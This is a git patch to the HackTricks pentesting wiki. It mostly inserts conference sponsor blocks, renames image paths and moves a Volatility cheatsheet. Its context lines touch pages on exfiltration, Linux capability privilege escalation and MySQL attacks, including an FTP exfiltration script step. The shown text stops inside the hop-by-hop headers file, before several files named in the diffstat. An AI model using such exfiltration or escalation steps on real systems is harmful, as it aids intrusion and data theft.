From 15cf8e6581ac25d97a1d49f6e528d3492b559e2e Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 25 Oct 2022 15:56:49 +0000 Subject: [PATCH] GitBook: [#3622] No subject --- README.md | 2 +- SUMMARY.md | 2 +- cryptography/certificates.md | 2 +- .../linux-exploiting-basic-esp/README.md | 2 +- .../memory-dump-analysis/README.md | 22 ++++- .../partitions-file-systems-carving/README.md | 2 +- .../pcap-inspection/README.md | 26 +++++- .../windows-forensics/README.md | 2 +- .../volatility-cheatsheet.md | 68 ++++++++++---- .../exfiltration.md | 6 +- .../phishing-methodology/README.md | 2 +- .../linux-capabilities.md | 43 ++++++++- .../macos-mdm/README.md | 2 +- mobile-pentesting/ios-pentesting/README.md | 2 +- .../pentesting-mysql.md | 24 +++++ .../iis-internet-information-services.md | 2 +- pentesting-web/abusing-hop-by-hop-headers.md | 59 ++++++------ pentesting-web/formula-doc-latex-injection.md | 2 +- pentesting-web/login-bypass/README.md | 42 +++++---- pentesting-web/saml-attacks/README.md | 2 +- pentesting-web/sql-injection/README.md | 34 +++++++ .../sql-injection/mysql-injection/README.md | 90 ++++++++++--------- .../README.md | 26 +++++- .../dpapi-extracting-passwords.md | 24 +++-- 24 files changed, 352 insertions(+), 136 deletions(-) rename forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md => generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md (90%) diff --git a/README.md b/README.md index e0b5edd20..effe7095e 100644 --- a/README.md +++ b/README.md @@ -40,7 +40,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm ### [RootedCON](https://www.rootedcon.com/) -
+
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. diff --git a/SUMMARY.md b/SUMMARY.md index 612e177c4..672e94d32 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -36,7 +36,7 @@ * [Linux Forensics](forensics/basic-forensic-methodology/linux-forensics.md) * [Malware Analysis](forensics/basic-forensic-methodology/malware-analysis.md) * [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md) - * [Volatility - CheatSheet](forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md) + * [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) * [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md) * [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md) * [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) diff --git a/cryptography/certificates.md b/cryptography/certificates.md index d643969b7..5d14050e0 100644 --- a/cryptography/certificates.md +++ b/cryptography/certificates.md @@ -12,7 +12,7 @@ - +
**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index 06dce2efd..300b10b7a 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -401,7 +401,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`** Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➀ x/20x 0xDIR_GOT` -![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png>) Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md index 1ad73eb12..16dd053c7 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md @@ -12,11 +12,19 @@ +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + +## Start + Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). -## [Volatility](volatility-examples.md) +## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) -The premiere open-source framework for memory dump analysis is [Volatility](volatility-examples.md). Volatility is a Python script for parsing memory dumps that were gathered with an external tool (or a VMware memory image gathered by pausing the VM). So, given the memory dump file and the relevant "profile" (the OS from which the dump was gathered), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifacts.\ +The premiere open-source framework for memory dump analysis is [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md). Volatility is a Python script for parsing memory dumps that were gathered with an external tool (or a VMware memory image gathered by pausing the VM). So, given the memory dump file and the relevant "profile" (the OS from which the dump was gathered), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifacts.\ From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) ## Mini dump crash report @@ -39,6 +47,16 @@ Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of You should **open** it using **IDA** or **Radare** to inspection it in **depth**. + + +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index 05355ed35..151f6f565 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -61,7 +61,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command) -![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (3).png>) +![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).png>) And then use the following code diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 6e29e63d0..2bcf9efe6 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -1,7 +1,5 @@ # Pcap Inspection -## Pcap Inspection -
Support HackTricks and get benefits! @@ -14,6 +12,14 @@
+
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + + + {% hint style="info" %} A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. {% endhint %} @@ -111,6 +117,14 @@ Using common carving techniques can be useful to extract files and information f You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. + + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Check Exploits/Malware ### Suricata @@ -239,6 +253,14 @@ rita show-exploded-dns -H --limit 10 zeek_logs [usb-keystrokes.md](usb-keystrokes.md) {% endcontent-ref %} +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 3b3b94c89..937c43248 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -156,7 +156,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (7).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (12).png>) ### USB Detective diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md similarity index 90% rename from forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md rename to generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md index fee083dac..ebbd5ceae 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md @@ -4,18 +4,24 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+​ + +
+ +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + + + If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility) ```bash @@ -176,6 +182,16 @@ The memory dump of a process will **extract everything** of the current status o volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/ ``` + + +​ + +
+ +​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Processes ### List processes @@ -399,6 +415,16 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist {% endtab %} {% endtabs %} + + +​ + +
+ +​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Services {% tabs %} @@ -786,18 +812,24 @@ volatility --profile=Win7SP1x86_23418 mbrparser -f file.dmp The MBR holds the information on how the logical partitions, containing [file systems](https://en.wikipedia.org/wiki/File\_system), are organized on that medium. The MBR also contains executable code to function as a loader for the installed operating systemβ€”usually by passing control over to the loader's [second stage](https://en.wikipedia.org/wiki/Second-stage\_boot\_loader), or in conjunction with each partition's [volume boot record](https://en.wikipedia.org/wiki/Volume\_boot\_record) (VBR). This MBR code is usually referred to as a [boot loader](https://en.wikipedia.org/wiki/Boot\_loader). From [here](https://en.wikipedia.org/wiki/Master\_boot\_record). + + +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index 72f583f24..b312ce58a 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -12,7 +12,7 @@
-\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -159,7 +159,7 @@ echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -371,7 +371,7 @@ Now we just copy-paste the text into our windows-shell. And it will automaticall * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} diff --git a/generic-methodologies-and-resources/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md index 6fe94667f..40b7e498c 100644 --- a/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/generic-methodologies-and-resources/phishing-methodology/README.md @@ -337,7 +337,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors -![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (6).png>) +![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1).png>) {% hint style="info" %} It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\ diff --git a/linux-hardening/privilege-escalation/linux-capabilities.md b/linux-hardening/privilege-escalation/linux-capabilities.md index 5c1ca9ce6..4fcfc00fe 100644 --- a/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/linux-hardening/privilege-escalation/linux-capabilities.md @@ -1,7 +1,5 @@ # Linux Capabilities -## Linux Capabilities -
Support HackTricks and get benefits! @@ -14,10 +12,17 @@
-Linux capabilities **provide a subset of the available root privileges** to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation. +
+ +​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.\ + + +{% embed url="https://www.rootedcon.com/" %} ## Why capabilities? +Linux capabilities **provide a subset of the available root privileges** to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation. + To better understand how Linux capabilities work, let’s have a look first at the problem it tries to solve. Let’s assume we are running a process as a normal user. This means we are non-privileged. We can only access data that owned by us, our group, or which is marked for access by all users. At some point in time, our process needs a little bit more permissions to fulfill its duties, like opening a network socket. The problem is that normal users can not open a socket, as this requires root permissions. @@ -328,6 +333,14 @@ docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash ``` +​ + +
+ +​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Privesc/Container Escape Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root. @@ -957,6 +970,14 @@ I exploit needs to find a pointer to something mounted on the host. The original **The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) +​ + +
+ +​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## CAP\_DAC\_OVERRIDE **This mean that you can bypass write permission checks on any file, so you can write any file.** @@ -1350,6 +1371,14 @@ kill -s SIGUSR1 [electron-cef-chromium-debugger-abuse.md](electron-cef-chromium-debugger-abuse.md) {% endcontent-ref %} +​ + +
+ +​​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## CAP\_NET\_BIND\_SERVICE **This means that it's possible to listen in any port (even in privileged ones).** You cannot escalate privileges directly with this capability. @@ -1540,6 +1569,14 @@ In addition, this capability also allows the process to view `dmesg` output, if * [https://www.linuxjournal.com/article/5737](https://www.linuxjournal.com/article/5737) * [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module) +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md index d911a43eb..c26af96ff 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -142,7 +142,7 @@ The response is a JSON dictionary with some important data like: * Signed using the **device identity certificate (from APNS)** * **Certificate chain** includes expired **Apple iPhone Device CA** -![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).png>) +![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png>) ### Step 6: Profile Installation diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md index 2dae69140..9a7e27ad9 100644 --- a/mobile-pentesting/ios-pentesting/README.md +++ b/mobile-pentesting/ios-pentesting/README.md @@ -723,7 +723,7 @@ You can collect console logs through the Xcode **Devices** window as follows: 5. Reproduce the problem. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. -![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (2).png>) +![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (15).png>) You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: diff --git a/network-services-pentesting/pentesting-mysql.md b/network-services-pentesting/pentesting-mysql.md index 57b1085c8..f50e4b74a 100644 --- a/network-services-pentesting/pentesting-mysql.md +++ b/network-services-pentesting/pentesting-mysql.md @@ -12,6 +12,12 @@
+
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## **Basic Information** **MySQL** is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (**SQL**). From [here](https://www.siteground.com/tutorials/php-mysql/mysql/). @@ -149,6 +155,14 @@ ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv opti **In this paper you can see a complete description of the attack and even how to extend it to RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\ **Here you can find an overview of the attack:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/) +​ + +
+ +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## POST ### Mysql User @@ -646,6 +660,16 @@ Entry_4: ``` + + +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md index 73babd4b3..5a1b0c332 100644 --- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -332,7 +332,7 @@ C:\xampp\tomcat\conf\server.xml If you see an error like the following one: -![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (3).png>) +![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1).png>) It means that the server **didn't receive the correct domain name** inside the Host header.\ In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. diff --git a/pentesting-web/abusing-hop-by-hop-headers.md b/pentesting-web/abusing-hop-by-hop-headers.md index 5db95d952..173c7b4bb 100644 --- a/pentesting-web/abusing-hop-by-hop-headers.md +++ b/pentesting-web/abusing-hop-by-hop-headers.md @@ -1,23 +1,24 @@ - +# hop-by-hop headers
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
